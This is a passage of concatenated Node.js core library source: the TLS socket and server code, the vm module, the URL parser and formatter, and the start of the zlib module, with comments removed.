    this.ssl.onclienthello = onclienthello.bind(this);
    this.ssl.onnewsession = onnewsession.bind(this);
    this.ssl.lastHandshakeTime = 0;
    this.ssl.handshakes = 0;

    if (this.server &&
        (listenerCount(this.server, 'resumeSession') > 0 ||
         listenerCount(this.server, 'newSession') > 0 ||
         listenerCount(this.server, 'OCSPRequest') > 0)) {
      this.ssl.enableSessionCallbacks();
    }
  } else {
    this.ssl.onhandshakestart = function() {};
    this.ssl.onhandshakedone = this._finishInit.bind(this);
    this.ssl.onocspresponse = onocspresponse.bind(this);

    if (options.session)
      this.ssl.setSession(options.session);
  }

  this.ssl.onerror = function(err) {
    if (self._writableState.errorEmitted)
      return;
    self._writableState.errorEmitted = true;

    
    if (!this._secureEstablished) {
      self._tlsError(err);
      self.destroy();
    } else if (options.isServer &&
               rejectUnauthorized &&
               /peer did not return a certificate/.test(err.message)) {
      
      self.destroy();
    } else {
      
      self._tlsError(err);
    }
  };

  
  
  
  if (process.features.tls_sni &&
      options.isServer &&
      options.server &&
      (options.SNICallback !== SNICallback ||
       options.server._contexts.length)) {
    assert(typeof options.SNICallback === 'function');
    this._SNICallback = options.SNICallback;
    this.ssl.enableHelloParser();
  }

  if (process.features.tls_npn && options.NPNProtocols)
    this.ssl.setNPNProtocols(options.NPNProtocols);

  if (options.handshakeTimeout > 0)
    this.setTimeout(options.handshakeTimeout, this._handleTimeout);

  
  if (socket && socket._readableState.length) {
    var buf;
    while ((buf = socket.read()) !== null)
      this.ssl.receive(buf);
  }
};

TLSSocket.prototype.renegotiate = function(options, callback) {
  var requestCert = this._requestCert,
      rejectUnauthorized = this._rejectUnauthorized;

  if (typeof options.requestCert !== 'undefined')
    requestCert = !!options.requestCert;
  if (typeof options.rejectUnauthorized !== 'undefined')
    rejectUnauthorized = !!options.rejectUnauthorized;

  if (requestCert !== this._requestCert ||
      rejectUnauthorized !== this._rejectUnauthorized) {
    this.ssl.setVerifyMode(requestCert, rejectUnauthorized);
    this._requestCert = requestCert;
    this._rejectUnauthorized = rejectUnauthorized;
  }
  if (!this.ssl.renegotiate()) {
    if (callback) {
      process.nextTick(function() {
        callback(new Error('Failed to renegotiate'));
      });
    }
    return false;
  }

  
  this.write('');

  if (callback) {
    this.once('secure', function() {
      callback(null);
    });
  }

  return true;
};

TLSSocket.prototype.setMaxSendFragment = function setMaxSendFragment(size) {
  return this.ssl.setMaxSendFragment(size) == 1;
};

TLSSocket.prototype.getTLSTicket = function getTLSTicket() {
  return this.ssl.getTLSTicket();
};

TLSSocket.prototype._handleTimeout = function() {
  this._tlsError(new Error('TLS handshake timeout'));
};

TLSSocket.prototype._tlsError = function(err) {
  this.emit('_tlsError', err);
  if (this._controlReleased)
    this.emit('error', err);
};

TLSSocket.prototype._releaseControl = function() {
  if (this._controlReleased)
    return false;
  this._controlReleased = true;
  this.removeListener('error', this._tlsError);
  return true;
};

TLSSocket.prototype._finishInit = function() {
  
  if (this._newSessionPending) {
    this._securePending = true;
    return;
  }

  if (process.features.tls_npn) {
    this.npnProtocol = this.ssl.getNegotiatedProtocol();
  }

  if (process.features.tls_sni && this._tlsOptions.isServer) {
    this.servername = this.ssl.getServername();
  }

  
  this._secureEstablished = true;
  if (this._tlsOptions.handshakeTimeout > 0)
    this.setTimeout(0, this._handleTimeout);
  this.emit('secure');
};

TLSSocket.prototype._start = function() {
  if (this._tlsOptions.requestOCSP)
    this.ssl.requestOCSP();
  this.ssl.start();
};

TLSSocket.prototype.setServername = function(name) {
  this.ssl.setServername(name);
};

TLSSocket.prototype.setSession = function(session) {
  if (util.isString(session))
    session = new Buffer(session, 'binary');
  this.ssl.setSession(session);
};

TLSSocket.prototype.getPeerCertificate = function(detailed) {
  if (this.ssl) {
    return common.translatePeerCertificate(
        this.ssl.getPeerCertificate(detailed));
  }

  return null;
};

TLSSocket.prototype.getSession = function() {
  if (this.ssl) {
    return this.ssl.getSession();
  }

  return null;
};

TLSSocket.prototype.isSessionReused = function() {
  if (this.ssl) {
    return this.ssl.isSessionReused();
  }

  return null;
};

TLSSocket.prototype.getCipher = function(err) {
  if (this.ssl) {
    return this.ssl.getCurrentCipher();
  } else {
    return null;
  }
};




































































function Server() {
  var options, listener;
  if (util.isObject(arguments[0])) {
    options = arguments[0];
    listener = arguments[1];
  } else if (util.isFunction(arguments[0])) {
    options = {};
    listener = arguments[0];
  }

  if (!(this instanceof Server)) return new Server(options, listener);

  this._contexts = [];

  var self = this;

  
  this.setOptions(options);

  var sharedCreds = tls.createSecureContext({
    pfx: self.pfx,
    key: self.key,
    passphrase: self.passphrase,
    cert: self.cert,
    ca: self.ca,
    ciphers: self.ciphers,
    ecdhCurve: self.ecdhCurve,
    dhparam: self.dhparam,
    secureProtocol: self.secureProtocol,
    secureOptions: self.secureOptions,
    honorCipherOrder: self.honorCipherOrder,
    crl: self.crl,
    sessionIdContext: self.sessionIdContext
  });
  this._sharedCreds = sharedCreds;

  var timeout = options.handshakeTimeout || (120 * 1000);

  if (!util.isNumber(timeout)) {
    throw new TypeError('handshakeTimeout must be a number');
  }

  if (self.sessionTimeout) {
    sharedCreds.context.setSessionTimeout(self.sessionTimeout);
  }

  if (self.ticketKeys) {
    sharedCreds.context.setTicketKeys(self.ticketKeys);
  }

  
  net.Server.call(this, function(raw_socket) {
    var socket = new TLSSocket(raw_socket, {
      secureContext: sharedCreds,
      isServer: true,
      server: self,
      requestCert: self.requestCert,
      rejectUnauthorized: self.rejectUnauthorized,
      handshakeTimeout: timeout,
      NPNProtocols: self.NPNProtocols,
      SNICallback: options.SNICallback || SNICallback
    });

    socket.on('secure', function() {
      if (socket._requestCert) {
        var verifyError = socket.ssl.verifyError();
        if (verifyError) {
          socket.authorizationError = verifyError.code;

          if (socket._rejectUnauthorized)
            socket.destroy();
        } else {
          socket.authorized = true;
        }
      }

      if (!socket.destroyed && socket._releaseControl())
        self.emit('secureConnection', socket);
    });

    var errorEmitted = false;
    socket.on('close', function() {
      
      if (!socket._controlReleased && !errorEmitted) {
        errorEmitted = true;
        var connReset = new Error('socket hang up');
        connReset.code = 'ECONNRESET';
        self.emit('clientError', connReset, socket);
      }
    });

    socket.on('_tlsError', function(err) {
      if (!socket._controlReleased && !errorEmitted) {
        errorEmitted = true;
        self.emit('clientError', err, socket);
      }
    });
  });

  if (listener) {
    this.on('secureConnection', listener);
  }
}

util.inherits(Server, net.Server);
exports.Server = Server;
exports.createServer = function(options, listener) {
  return new Server(options, listener);
};


Server.prototype._getServerData = function() {
  return {
    ticketKeys: this._sharedCreds.context.getTicketKeys().toString('hex')
  };
};


Server.prototype._setServerData = function(data) {
  this._sharedCreds.context.setTicketKeys(new Buffer(data.ticketKeys, 'hex'));
};


Server.prototype.setOptions = function(options) {
  if (util.isBoolean(options.requestCert)) {
    this.requestCert = options.requestCert;
  } else {
    this.requestCert = false;
  }

  if (util.isBoolean(options.rejectUnauthorized)) {
    this.rejectUnauthorized = options.rejectUnauthorized;
  } else {
    this.rejectUnauthorized = false;
  }

  if (options.pfx) this.pfx = options.pfx;
  if (options.key) this.key = options.key;
  if (options.passphrase) this.passphrase = options.passphrase;
  if (options.cert) this.cert = options.cert;
  if (options.ca) this.ca = options.ca;
  if (options.secureProtocol) this.secureProtocol = options.secureProtocol;
  if (options.crl) this.crl = options.crl;
  if (options.ciphers) this.ciphers = options.ciphers;
  if (!util.isUndefined(options.ecdhCurve))
    this.ecdhCurve = options.ecdhCurve;
  if (options.dhparam) this.dhparam = options.dhparam;
  if (options.sessionTimeout) this.sessionTimeout = options.sessionTimeout;
  if (options.ticketKeys) this.ticketKeys = options.ticketKeys;
  var secureOptions = options.secureOptions || 0;
  if (options.honorCipherOrder)
    this.honorCipherOrder = true;
  else
    this.honorCipherOrder = false;
  if (secureOptions) this.secureOptions = secureOptions;
  if (options.NPNProtocols) tls.convertNPNProtocols(options.NPNProtocols, this);
  if (options.sessionIdContext) {
    this.sessionIdContext = options.sessionIdContext;
  } else {
    this.sessionIdContext = crypto.createHash('md5')
                                  .update(process.argv.join(' '))
                                  .digest('hex');
  }
};


Server.prototype.addContext = function(servername, context) {
  if (!servername) {
    throw new Error('Servername is required parameter for Server.addContext');
  }

  var re = new RegExp('^' +
                      servername.replace(/([\.^$+?\-\\[\]{}])/g, '\\$1')
                                .replace(/\*/g, '[^\.]*') +
                      '$');
  this._contexts.push([re, tls.createSecureContext(context).context]);
};

function SNICallback(servername, callback) {
  var ctx;

  this.server._contexts.some(function(elem) {
    if (!util.isNull(servername.match(elem[0]))) {
      ctx = elem[1];
      return true;
    }
  });

  callback(null, ctx);
}
















function normalizeConnectArgs(listArgs) {
  var args = net._normalizeConnectArgs(listArgs);
  var options = args[0];
  var cb = args[1];

  if (util.isObject(listArgs[1])) {
    options = util._extend(options, listArgs[1]);
  } else if (util.isObject(listArgs[2])) {
    options = util._extend(options, listArgs[2]);
  }

  return (cb) ? [options, cb] : [options];
}

function legacyConnect(hostname, options, NPN, context) {
  assert(options.socket);
  if (!tls_legacy)
    tls_legacy = require('_tls_legacy');

  var pair = tls_legacy.createSecurePair(context,
                                         false,
                                         true,
                                         !!options.rejectUnauthorized,
                                         {
                                           NPNProtocols: NPN.NPNProtocols,
                                           servername: hostname
                                         });
  tls_legacy.pipe(pair, options.socket);
  pair.cleartext._controlReleased = true;
  pair.on('error', function(err) {
    pair.cleartext.emit('error', err);
  });

  return pair;
}

exports.connect = function() {
  var args = normalizeConnectArgs(arguments);
  var options = args[0];
  var cb = args[1];

  var defaults = {
    rejectUnauthorized: '0',
    ciphers: tls.DEFAULT_CIPHERS,
    checkServerIdentity: tls.checkServerIdentity
  };

  options = util._extend(defaults, options || {});

  assert(typeof options.checkServerIdentity === 'function');

  var hostname = options.servername ||
                 options.host ||
                 options.socket && options.socket._host,
      NPN = {},
      context = tls.createSecureContext(options);
  tls.convertNPNProtocols(options.NPNProtocols, NPN);

  
  
  var socket;
  var legacy;
  var result;
  if (options.socket instanceof TLSSocket) {
    
    legacy = true;
    socket = legacyConnect(hostname, options, NPN, context);
    result = socket.cleartext;
  } else {
    legacy = false;
    socket = new TLSSocket(options.socket, {
      secureContext: context,
      isServer: false,
      requestCert: true,
      rejectUnauthorized: options.rejectUnauthorized,
      session: options.session,
      NPNProtocols: NPN.NPNProtocols,
      requestOCSP: options.requestOCSP
    });
    result = socket;
  }

  if (socket._handle && !socket._connecting) {
    onHandle();
  } else {
    
    
    if (!legacy && options.socket) {
      options.socket.once('connect', function() {
        assert(options.socket._handle);
        socket._handle = options.socket._handle;
        socket._handle.owner = socket;
        socket.emit('connect');
      });
    }
    socket.once('connect', onHandle);
  }

  if (cb)
    result.once('secureConnect', cb);

  if (!options.socket) {
    assert(!legacy);
    var connect_opt;
    if (options.path && !options.port) {
      connect_opt = { path: options.path };
    } else {
      connect_opt = {
        port: options.port,
        host: options.host,
        localAddress: options.localAddress
      };
    }
    socket.connect(connect_opt);
  }

  return result;

  function onHandle() {
    if (!legacy)
      socket._releaseControl();

    if (options.session)
      socket.setSession(options.session);

    if (!legacy) {
      if (options.servername)
        socket.setServername(options.servername);

      socket._start();
    }
    socket.on('secure', function() {
      var verifyError = socket.ssl.verifyError();

      
      if (!verifyError) {
        var cert = result.getPeerCertificate();
        verifyError = options.checkServerIdentity(hostname, cert);
      }

      if (verifyError) {
        result.authorized = false;
        result.authorizationError = verifyError.code || verifyError.message;

        if (options.rejectUnauthorized) {
          result.emit('error', verifyError);
          result.destroy();
          return;
        } else {
          result.emit('secureConnect');
        }
      } else {
        result.authorized = true;
        result.emit('secureConnect');
      }

      
      result.removeListener('end', onHangUp);
    });

    function onHangUp() {
      
      if (!socket._hadError) {
        socket._hadError = true;
        var error = new Error('socket hang up');
        error.code = 'ECONNRESET';
        socket.destroy();
        socket.emit('error', error);
      }
    }
    result.once('end', onHangUp);
  }
};
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       

========






















var binding = process.binding('contextify');
var Script = binding.ContextifyScript;
var util = require('util');











Script.prototype.runInNewContext = function(sandbox, options) {
  var context = exports.createContext(sandbox);
  return this.runInContext(context, options);
};

exports.Script = Script;

exports.createScript = function(code, options) {
  return new Script(code, options);
};

exports.createContext = function(sandbox) {
  if (util.isUndefined(sandbox)) {
    sandbox = {};
  } else if (binding.isContext(sandbox)) {
    return sandbox;
  }

  binding.makeContext(sandbox);
  return sandbox;
};

exports.runInDebugContext = function(code) {
  return binding.runInDebugContext(code);
};

exports.runInContext = function(code, contextifiedSandbox, options) {
  var script = new Script(code, options);
  return script.runInContext(contextifiedSandbox, options);
};

exports.runInNewContext = function(code, sandbox, options) {
  var script = new Script(code, options);
  return script.runInNewContext(sandbox, options);
};

exports.runInThisContext = function(code, options) {
  var script = new Script(code, options);
  return script.runInThisContext(options);
};

exports.isContext = binding.isContext;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            

========






















var punycode = require('punycode');
var util = require('util');

exports.parse = urlParse;
exports.resolve = urlResolve;
exports.resolveObject = urlResolveObject;
exports.format = urlFormat;

exports.Url = Url;

function Url() {
  this.protocol = null;
  this.slashes = null;
  this.auth = null;
  this.host = null;
  this.port = null;
  this.hostname = null;
  this.hash = null;
  this.search = null;
  this.query = null;
  this.pathname = null;
  this.path = null;
  this.href = null;
}





var protocolPattern = /^([a-z0-9.+-]+:)/i,
    portPattern = /:[0-9]*$/,

    
    simplePathPattern = /^(\/\/?(?!\/)[^\?\s]*)(\?[^\s]*)?$/,

    
    
    delims = ['<', '>', '"', '`', ' ', '\r', '\n', '\t'],

    
    unwise = ['{', '}', '|', '\\', '^', '`'].concat(delims),

    
    autoEscape = ['\''].concat(unwise),
    
    
    
    
    nonHostChars = ['%', '/', '?', ';', '#'].concat(autoEscape),
    hostEndingChars = ['/', '?', '#'],
    hostnameMaxLen = 255,
    hostnamePartPattern = /^[a-z0-9A-Z_-]{0,63}$/,
    hostnamePartStart = /^([a-z0-9A-Z_-]{0,63})(.*)$/,
    
    unsafeProtocol = {
      'javascript': true,
      'javascript:': true
    },
    
    hostlessProtocol = {
      'javascript': true,
      'javascript:': true
    },
    
    slashedProtocol = {
      'http': true,
      'https': true,
      'ftp': true,
      'gopher': true,
      'file': true,
      'http:': true,
      'https:': true,
      'ftp:': true,
      'gopher:': true,
      'file:': true
    },
    querystring = require('querystring');

function urlParse(url, parseQueryString, slashesDenoteHost) {
  if (url && util.isObject(url) && url instanceof Url) return url;

  var u = new Url;
  u.parse(url, parseQueryString, slashesDenoteHost);
  return u;
}

Url.prototype.parse = function(url, parseQueryString, slashesDenoteHost) {
  if (!util.isString(url)) {
    throw new TypeError("Parameter 'url' must be a string, not " + typeof url);
  }

  
  
  var hashSplit = url.split('#');
  hashSplit[0] = hashSplit[0].replace(/\\/g, '/');
  url = hashSplit.join('#');

  var rest = url;

  
  
  rest = rest.trim();

  if (!slashesDenoteHost && hashSplit.length === 1) {
    
    var simplePath = simplePathPattern.exec(rest);
    if (simplePath) {
      this.path = rest;
      this.href = rest;
      this.pathname = simplePath[1];
      if (simplePath[2]) {
        this.search = simplePath[2];
        if (parseQueryString) {
          this.query = querystring.parse(this.search.substr(1));
        } else {
          this.query = this.search.substr(1);
        }
      }
      return this;
    }
  }

  var proto = protocolPattern.exec(rest);
  if (proto) {
    proto = proto[0];
    var lowerProto = proto.toLowerCase();
    this.protocol = lowerProto;
    rest = rest.substr(proto.length);
  }

  
  
  
  
  if (slashesDenoteHost || proto || rest.match(/^\/\/[^@\/]+@[^@\/]+/)) {
    var slashes = rest.substr(0, 2) === '//';
    if (slashes && !(proto && hostlessProtocol[proto])) {
      rest = rest.substr(2);
      this.slashes = true;
    }
  }

  if (!hostlessProtocol[proto] &&
      (slashes || (proto && !slashedProtocol[proto]))) {

    
    
    
    
    
    
    
    
    
    
    

    
    

    
    var hostEnd = -1;
    for (var i = 0; i < hostEndingChars.length; i++) {
      var hec = rest.indexOf(hostEndingChars[i]);
      if (hec !== -1 && (hostEnd === -1 || hec < hostEnd))
        hostEnd = hec;
    }

    
    
    var auth, atSign;
    if (hostEnd === -1) {
      
      atSign = rest.lastIndexOf('@');
    } else {
      
      
      atSign = rest.lastIndexOf('@', hostEnd);
    }

    
    
    if (atSign !== -1) {
      auth = rest.slice(0, atSign);
      rest = rest.slice(atSign + 1);
      this.auth = decodeURIComponent(auth);
    }

    
    hostEnd = -1;
    for (var i = 0; i < nonHostChars.length; i++) {
      var hec = rest.indexOf(nonHostChars[i]);
      if (hec !== -1 && (hostEnd === -1 || hec < hostEnd))
        hostEnd = hec;
    }
    
    if (hostEnd === -1)
      hostEnd = rest.length;

    this.host = rest.slice(0, hostEnd);
    rest = rest.slice(hostEnd);

    
    this.parseHost();

    
    
    this.hostname = this.hostname || '';

    
    
    var ipv6Hostname = this.hostname[0] === '[' &&
        this.hostname[this.hostname.length - 1] === ']';

    
    if (!ipv6Hostname) {
      var hostparts = this.hostname.split(/\./);
      for (var i = 0, l = hostparts.length; i < l; i++) {
        var part = hostparts[i];
        if (!part) continue;
        if (!part.match(hostnamePartPattern)) {
          var newpart = '';
          for (var j = 0, k = part.length; j < k; j++) {
            if (part.charCodeAt(j) > 127) {
              
              
              
              newpart += 'x';
            } else {
              newpart += part[j];
            }
          }
          
          if (!newpart.match(hostnamePartPattern)) {
            var validParts = hostparts.slice(0, i);
            var notHost = hostparts.slice(i + 1);
            var bit = part.match(hostnamePartStart);
            if (bit) {
              validParts.push(bit[1]);
              notHost.unshift(bit[2]);
            }
            if (notHost.length) {
              rest = '/' + notHost.join('.') + rest;
            }
            this.hostname = validParts.join('.');
            break;
          }
        }
      }
    }

    if (this.hostname.length > hostnameMaxLen) {
      this.hostname = '';
    } else {
      
      this.hostname = this.hostname.toLowerCase();
    }

    if (!ipv6Hostname) {
      
      
      
      
      this.hostname = punycode.toASCII(this.hostname);
    }

    var p = this.port ? ':' + this.port : '';
    var h = this.hostname || '';
    this.host = h + p;
    this.href += this.host;

    
    
    if (ipv6Hostname) {
      this.hostname = this.hostname.substr(1, this.hostname.length - 2);
      if (rest[0] !== '/') {
        rest = '/' + rest;
      }
    }
  }

  
  
  if (!unsafeProtocol[lowerProto]) {

    
    
    
    for (var i = 0, l = autoEscape.length; i < l; i++) {
      var ae = autoEscape[i];
      var esc = encodeURIComponent(ae);
      if (esc === ae) {
        esc = escape(ae);
      }
      rest = rest.split(ae).join(esc);
    }
  }


  
  var hash = rest.indexOf('#');
  if (hash !== -1) {
    
    this.hash = rest.substr(hash);
    rest = rest.slice(0, hash);
  }
  var qm = rest.indexOf('?');
  if (qm !== -1) {
    this.search = rest.substr(qm);
    this.query = rest.substr(qm + 1);
    if (parseQueryString) {
      this.query = querystring.parse(this.query);
    }
    rest = rest.slice(0, qm);
  } else if (parseQueryString) {
    
    this.search = '';
    this.query = {};
  }
  if (rest) this.pathname = rest;
  if (slashedProtocol[lowerProto] &&
      this.hostname && !this.pathname) {
    this.pathname = '/';
  }

  
  if (this.pathname || this.search) {
    var p = this.pathname || '';
    var s = this.search || '';
    this.path = p + s;
  }

  
  this.href = this.format();
  return this;
};


function urlFormat(obj) {
  
  
  
  
  if (util.isString(obj)) obj = urlParse(obj);
  if (!(obj instanceof Url)) return Url.prototype.format.call(obj);
  return obj.format();
}

Url.prototype.format = function() {
  var auth = this.auth || '';
  if (auth) {
    auth = encodeURIComponent(auth);
    auth = auth.replace(/%3A/i, ':');
    auth += '@';
  }

  var protocol = this.protocol || '',
      pathname = this.pathname || '',
      hash = this.hash || '',
      host = false,
      query = '';

  if (this.host) {
    host = auth + this.host;
  } else if (this.hostname) {
    host = auth + (this.hostname.indexOf(':') === -1 ?
        this.hostname :
        '[' + this.hostname + ']');
    if (this.port) {
      host += ':' + this.port;
    }
  }

  if (this.query &&
      util.isObject(this.query) &&
      Object.keys(this.query).length) {
    query = querystring.stringify(this.query);
  }

  var search = this.search || (query && ('?' + query)) || '';

  if (protocol && protocol.substr(-1) !== ':') protocol += ':';

  
  
  if (this.slashes ||
      (!protocol || slashedProtocol[protocol]) && host !== false) {
    host = '//' + (host || '');
    if (pathname && pathname.charAt(0) !== '/') pathname = '/' + pathname;
  } else if (!host) {
    host = '';
  }

  if (hash && hash.charAt(0) !== '#') hash = '#' + hash;
  if (search && search.charAt(0) !== '?') search = '?' + search;

  pathname = pathname.replace(/[?#]/g, function(match) {
    return encodeURIComponent(match);
  });
  search = search.replace('#', '%23');

  return protocol + host + pathname + search + hash;
};

function urlResolve(source, relative) {
  return urlParse(source, false, true).resolve(relative);
}

Url.prototype.resolve = function(relative) {
  return this.resolveObject(urlParse(relative, false, true)).format();
};

function urlResolveObject(source, relative) {
  if (!source) return relative;
  return urlParse(source, false, true).resolveObject(relative);
}

Url.prototype.resolveObject = function(relative) {
  if (util.isString(relative)) {
    var rel = new Url();
    rel.parse(relative, false, true);
    relative = rel;
  }

  var result = new Url();
  var tkeys = Object.keys(this);
  for (var tk = 0; tk < tkeys.length; tk++) {
    var tkey = tkeys[tk];
    result[tkey] = this[tkey];
  }

  
  
  result.hash = relative.hash;

  
  if (relative.href === '') {
    result.href = result.format();
    return result;
  }

  
  if (relative.slashes && !relative.protocol) {
    
    var rkeys = Object.keys(relative);
    for (var rk = 0; rk < rkeys.length; rk++) {
      var rkey = rkeys[rk];
      if (rkey !== 'protocol')
        result[rkey] = relative[rkey];
    }

    
    if (slashedProtocol[result.protocol] &&
        result.hostname && !result.pathname) {
      result.path = result.pathname = '/';
    }

    result.href = result.format();
    return result;
  }

  if (relative.protocol && relative.protocol !== result.protocol) {
    
    
    
    
    
    
    
    
    if (!slashedProtocol[relative.protocol]) {
      var keys = Object.keys(relative);
      for (var v = 0; v < keys.length; v++) {
        var k = keys[v];
        result[k] = relative[k];
      }
      result.href = result.format();
      return result;
    }

    result.protocol = relative.protocol;
    if (!relative.host && !hostlessProtocol[relative.protocol]) {
      var relPath = (relative.pathname || '').split('/');
      while (relPath.length && !(relative.host = relPath.shift()));
      if (!relative.host) relative.host = '';
      if (!relative.hostname) relative.hostname = '';
      if (relPath[0] !== '') relPath.unshift('');
      if (relPath.length < 2) relPath.unshift('');
      result.pathname = relPath.join('/');
    } else {
      result.pathname = relative.pathname;
    }
    result.search = relative.search;
    result.query = relative.query;
    result.host = relative.host || '';
    result.auth = relative.auth;
    result.hostname = relative.hostname || relative.host;
    result.port = relative.port;
    
    if (result.pathname || result.search) {
      var p = result.pathname || '';
      var s = result.search || '';
      result.path = p + s;
    }
    result.slashes = result.slashes || relative.slashes;
    result.href = result.format();
    return result;
  }

  var isSourceAbs = (result.pathname && result.pathname.charAt(0) === '/'),
      isRelAbs = (
          relative.host ||
          relative.pathname && relative.pathname.charAt(0) === '/'
      ),
      mustEndAbs = (isRelAbs || isSourceAbs ||
                    (result.host && relative.pathname)),
      removeAllDots = mustEndAbs,
      srcPath = result.pathname && result.pathname.split('/') || [],
      relPath = relative.pathname && relative.pathname.split('/') || [],
      psychotic = result.protocol && !slashedProtocol[result.protocol];

  
  
  
  
  
  if (psychotic) {
    result.hostname = '';
    result.port = null;
    if (result.host) {
      if (srcPath[0] === '') srcPath[0] = result.host;
      else srcPath.unshift(result.host);
    }
    result.host = '';
    if (relative.protocol) {
      relative.hostname = null;
      relative.port = null;
      if (relative.host) {
        if (relPath[0] === '') relPath[0] = relative.host;
        else relPath.unshift(relative.host);
      }
      relative.host = null;
    }
    mustEndAbs = mustEndAbs && (relPath[0] === '' || srcPath[0] === '');
  }

  if (isRelAbs) {
    
    result.host = (relative.host || relative.host === '') ?
                  relative.host : result.host;
    result.hostname = (relative.hostname || relative.hostname === '') ?
                      relative.hostname : result.hostname;
    result.search = relative.search;
    result.query = relative.query;
    srcPath = relPath;
    
  } else if (relPath.length) {
    
    
    if (!srcPath) srcPath = [];
    srcPath.pop();
    srcPath = srcPath.concat(relPath);
    result.search = relative.search;
    result.query = relative.query;
  } else if (!util.isNullOrUndefined(relative.search)) {
    
    
    
    if (psychotic) {
      result.hostname = result.host = srcPath.shift();
      
      
      
      var authInHost = result.host && result.host.indexOf('@') > 0 ?
                       result.host.split('@') : false;
      if (authInHost) {
        result.auth = authInHost.shift();
        result.host = result.hostname = authInHost.shift();
      }
    }
    result.search = relative.search;
    result.query = relative.query;
    
    if (!util.isNull(result.pathname) || !util.isNull(result.search)) {
      result.path = (result.pathname ? result.pathname : '') +
                    (result.search ? result.search : '');
    }
    result.href = result.format();
    return result;
  }

  if (!srcPath.length) {
    
    
    result.pathname = null;
    
    if (result.search) {
      result.path = '/' + result.search;
    } else {
      result.path = null;
    }
    result.href = result.format();
    return result;
  }

  
  
  
  var last = srcPath.slice(-1)[0];
  var hasTrailingSlash = (
      (result.host || relative.host) && (last === '.' || last === '..') ||
      last === '');

  
  
  var up = 0;
  for (var i = srcPath.length; i >= 0; i--) {
    last = srcPath[i];
    if (last === '.') {
      srcPath.splice(i, 1);
    } else if (last === '..') {
      srcPath.splice(i, 1);
      up++;
    } else if (up) {
      srcPath.splice(i, 1);
      up--;
    }
  }

  
  if (!mustEndAbs && !removeAllDots) {
    for (; up--; up) {
      srcPath.unshift('..');
    }
  }

  if (mustEndAbs && srcPath[0] !== '' &&
      (!srcPath[0] || srcPath[0].charAt(0) !== '/')) {
    srcPath.unshift('');
  }

  if (hasTrailingSlash && (srcPath.join('/').substr(-1) !== '/')) {
    srcPath.push('');
  }

  var isAbsolute = srcPath[0] === '' ||
      (srcPath[0] && srcPath[0].charAt(0) === '/');

  
  if (psychotic) {
    result.hostname = result.host = isAbsolute ? '' :
                                    srcPath.length ? srcPath.shift() : '';
    
    
    
    var authInHost = result.host && result.host.indexOf('@') > 0 ?
                     result.host.split('@') : false;
    if (authInHost) {
      result.auth = authInHost.shift();
      result.host = result.hostname = authInHost.shift();
    }
  }

  mustEndAbs = mustEndAbs || (result.host && srcPath.length);

  if (mustEndAbs && !isAbsolute) {
    srcPath.unshift('');
  }

  if (!srcPath.length) {
    result.pathname = null;
    result.path = null;
  } else {
    result.pathname = srcPath.join('/');
  }

  
  if (!util.isNull(result.pathname) || !util.isNull(result.search)) {
    result.path = (result.pathname ? result.pathname : '') +
                  (result.search ? result.search : '');
  }
  result.auth = relative.auth || result.auth;
  result.slashes = result.slashes || relative.slashes;
  result.href = result.format();
  return result;
};

Url.prototype.parseHost = function() {
  var host = this.host;
  var port = portPattern.exec(host);
  if (port) {
    port = port[0];
    if (port !== ':') {
      this.port = port.substr(1);
    }
    host = host.substr(0, host.length - port.length);
  }
  if (host) this.hostname = host;
};
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 

========






















var Transform = require('_stream_transform');

var binding = process.binding('zlib');
var util = require('util');
var assert = require('assert').ok;



binding.Z_MIN_WINDOWBITS = 8;
binding.Z_MAX_WINDOWBITS = 15;
binding.Z_DEFAULT_WINDOWBITS = 15;




binding.Z_MIN_CHUNK = 64;
binding.Z_MAX_CHUNK = Infinity;
binding.Z_DEFAULT_CHUNK = (16 * 1024);

binding.Z_MIN_MEMLEVEL = 1;
binding.Z_MAX_MEMLEVEL = 9;
binding.Z_DEFAULT_MEMLEVEL = 8;

binding.Z_MIN_LEVEL = -1;
binding.Z_MAX_LEVEL = 9;
binding.Z_DEFAULT_LEVEL = binding.Z_DEFAULT_COMPRESSION;


var bkeys = Object.keys(binding);
for (var bk = 0; bk < bkeys.length; bk++) {
  var bkey = bkeys[bk];
  if (bkey.match(/^Z/)) exports[bkey] = binding[bkey];
}


exports.codes = {
  Z_OK: binding.Z_OK,
  Z_STREAM_END: binding.Z_STREAM_END,
  Z_NEED_DICT: binding.Z_NEED_DICT,
  Z_ERRNO: binding.Z_ERRNO,
  Z_STREAM_ERROR: binding.Z_STREAM_ERROR,
  Z_DATA_ERROR: binding.Z_DATA_ERROR,
  Z_MEM_ERROR: binding.Z_MEM_ERROR,
  Z_BUF_ERROR: binding.Z_BUF_ERROR,
  Z_VERSION_ERROR: binding.Z_VERSION_ERROR
};

var ckeys = Object.keys(exports.codes);
for (var ck = 0; ck < ckeys.length; ck++) {
  var ckey = ckeys[ck];
